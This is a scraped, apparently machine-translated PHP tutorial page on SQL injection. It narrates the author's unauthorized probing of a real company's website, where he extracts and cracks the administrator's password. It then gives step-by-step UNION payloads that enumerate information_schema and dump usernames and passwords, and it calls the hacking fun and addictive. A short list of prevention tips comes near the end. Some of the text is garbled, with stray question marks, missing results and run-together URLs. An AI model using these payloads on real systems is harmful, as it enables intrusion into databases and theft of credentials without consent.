Home > Article > Backend Development > Summary of some common SQL injection methods in php_PHP tutorial
Summary of some common SQL injection methods in php_PHP tutorial
- WBOYOriginal
- 2016-07-13 10:47:521112browse
SQL injection is to use some bugs in your syntax or data processing to explode the database, and then download your data or directly get your administrator to enter some operations that have an impact on the website, but in SQL injection we have those Bugs are exploited by others. Below, the editor has collected some basic and slightly advanced methods. They are only used for learning and reference, and the others are ignored.
The most basic SQL injection vulnerability method
The college held a meeting this morning. They talked about arrangements for graduation internships and design. They also explained that a company will be recruiting tomorrow, and asked interested people to go back and log on to their company's website to take a look. Of course I have no interest in paperen, but my classmate Xiaohua in the dormitory is a little interested, and I visited their website when I came back. But...?
I also took a look at paperen. The website is not good, it’s asp. I don’t know why I suddenly wanted to take a look at it to see if there is any sql injection vulnerability. I went to their website and took a look at it. On this page, go to the company news, there is a news URL is xwzx_content.asp?id=456 (it is normal to pass a value, it is also reasonable to check the database based on the id value and display the corresponding data), but...?
paperen I changed the parameters to xwzx_content.asp?id=456 and 1=1 and tried it, and found that the display is the same as id=456. (It does not prove whether there is a vulnerability)?
Then try this again
| 代码如下 | 复制代码 |
| xwzx_content.asp?id=456 and '1'='1 | |
The result is
You can tell from the error message that there is a vulnerability, because you can just find a table in your database and try this statement?
select * from table where id=1 and 1=1 (the ID number of a certain record). In fact, adding and 1=1 has the same result as not adding it, because 1=1 is true. SQL can definitely be executed, but it won’t work if 1=2, because obviously 1 is not equal to 2. If it is false, no data can be found. ?
Then continue to construct the statement xwzx_content.asp?id=456 or 1=1, The result is
It is also obvious to get this result, because the previous 1=1 (true) result of or is also true. All data records will be found regardless of whether your data with ID number 456 exists or not. ?
The above operations have confirmed that the sql injection vulnerability does exist on this page. Let’s start the formal injection to reveal the information we want to get, mainly based on your RP. ?
We need to use union to query the management password and account number. Of course, the premise is that you have to guess the name of the administrator's table. ?
paperenThe first thing I thought of was the administrator, give it a try.
1.xwzx_content.asp?id=456?union select?* from administrator The result is
The prompt number of fields does not match, then let’s guess its number of fields
1.xwzx_content.asp?id=456?union select?1,2,3,4,5,6 from administrator result is
It seems that I guessed it correctly. There are 10 fields in this table, 4 of which will be displayed on the page. Maybe you don't quite understand what's going on here. Paperen I might as well post a screenshot of myself in mysql.
1.sql command is SELECT * FROM `paper_blog` WHERE id =1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 FROM member
?
See 1, 2, 3, 4, 5 in the second row? Anyway, you can understand it yourself. I don’t know if you have ever used the union query. Simply put, it is to combine data from other tables. Check them all out. ?
Let’s guess the field name where he puts the administrator account. I’ll guess it’s name.
1.xwzx_content.asp?id=456?union select?1,2,3,name,5,6 from administrator result is
This proves that the guess was wrong. Keep guessing and call the administrator, hehe, it turned out to be true.
It is revealed that the administrator’s account is the administrator, and then his password is revealed, let’s guess it is password.
1.xwzx_content.asp?id=456?union select?1,2,3,password,5,6 from administrator result is
The password is 32 bits and should be encrypted by MD5. I went to some online MD5 decryption websites with ctrl+c and found that the password is also the administrator... This security awareness is too poor. ?
You already have your account and password, what else is missing? It's obviously the backend address, but I still can't find it for paperen. I'm not sure if it's the right address. I wonder if you're a little disappointed when you see this. Alas, I'm a bit disappointed with paperen too, but forget it, I still have to publish a blog post. First No time to touch it. Anyway, the impression this website gave me was not very good, and the company probably wasn’t that good either. ?
In fact, it is not easy to invade a website, and it is also not easy to prevent intrusion. However, from the above, we can see some points to prevent such very low-level mistakes. ?
1. Filter and judge the parameters passed by get
2. Do not refer to the database tables or table names of some open source programs to build your own database
3. Use a more complex password, at least not administrator, administrator 888 or the like
4. It is best to change the name of the folder where the background files are placed to something special so that no one can guess it easily
5. It is best to change the suffix of the database file of the asp website to asp to prevent it from being downloaded?
Slightly more advanced SQL injection
Remember the SQL written in "Is this how you process data from $_GET?",
| 代码如下 | 复制代码 |
| 1.$sql = 'select * from goods where id='.$id; | |
The problems caused by not filtering the incoming data or even enclosing it in single quotes are quite clear in that article. If you can guess other tables in the database, you can also find other tables. content, and this time Paperen wants to talk about some more advanced techniques for using this vulnerability.
If you have confirmed that there is a vulnerability here, (how to prove it? Simply test it separately and change the parameters to id=1=1 and id=1=2 and then look at the page to know whether there is a vulnerability. If it is displayed If the information is different or wrong, it proves that there is a vulnerability), but even if it is confirmed that there is a vulnerability, what should I do if I cannot guess the table names of other tables. Using a very evil trick, first release the injected URL.
Reveal the current database name
1.URL:
| 代码如下 | 复制代码 |
| http://localhost/mytest/sqlinject/?id=-1+UNION+select+1,2,3,database(),5,6,7,8,9+from+information_schema.columns2.SQL:SELECT * FROM goods WHERE id=-1 UNION SELECT 1,2,3,DATABASE(),5,6,7,8,9 FROM information_schema.columns | |
Then get the hex value of database test and then pop out the table name in the test database (get the hex value of test select hex('test') and put it in mysql and run it to see the result, 74657374 front Plus 0x, hexadecimal number)
1.URL:
| 代码如下 | 复制代码 |
| http://localhost/mytest/sqlinject/?id=-1+UNION+SELECT+1,2,3,GROUP_CONCAT(DISTINCT(table_name)),5,6,7,8,9+FROM+information_schema.columns+AS+c+WHERE+c.table_schema=0x746573742.SQL:SELECT * FROM test.goods WHERE id = -1 UNION SELECT 1 , 2, 3, GROUP_CONCAT( DISTINCT table_name ) , 5, 6, 7, 8, 9 FROM information_schema.columns AS c WHERE c.table_schema = 0x74657374 | |
Then put the hex value of the user table and check the fields of the user table. Now it is DISTINCT (column_name). It is best to add and. If there is more than one database with a user table, the results may be misleading. you.
1.URL:
| 代码如下 | 复制代码 |
| http://localhost/mytest/sqlinject/?id=-1+UNION+SELECT+1,2,3,GROUP_CONCAT(DISTINCT(column_name)),5,6,7,8,9+FROM+information_schema.columns+WHERE+table_name=0x75736572+AND+TABLE_SCHEMA=0x746573742.SQL:select * from goods where id=-1 UNION SELECT 1,2,3,GROUP_CONCAT(DISTINCT(column_name)),5,6,7,8,9 FROM information_schema.columns WHERE table_name=0x75736572 AND TABLE_SCHEMA=0x74657374 | |
you see! We have obtained the information we want step by step. Isn’t it interesting? So Paperen said that this kind of thing will become addictive.
Then directly reveal the clear code of his user table.
| The code is as follows | Copy code | ||||
|
|||||
But there may be more than one user data in the user table, so add a limit
| 代码如下 | 复制代码 |
| 1.URL:http://localhost/mytest/sqlinject/?id=-1+UNION+SELECT+1,password,3,username,5,6,7,8,9+FROM+user+limit+1,12.SQL:select * from goods where id=-1 UNION SELECT 1,password,3,username,5,6,7,8,9 FROM user limit 1,1 | |
Then take the password you obtained
Crack to get the clear code, then know the backend path, use the user account and the cracked password to log in to the backend, but the next two steps of paperen also depend on your character. If the password is made more complicated, it will be difficult for you to crack it, even if you Even if it is cracked, you still need to find the backend address. So…that’s it. Just for fun. (PS: You can also use load_file to get the contents of some files on the server, provided you also guess the path of the file)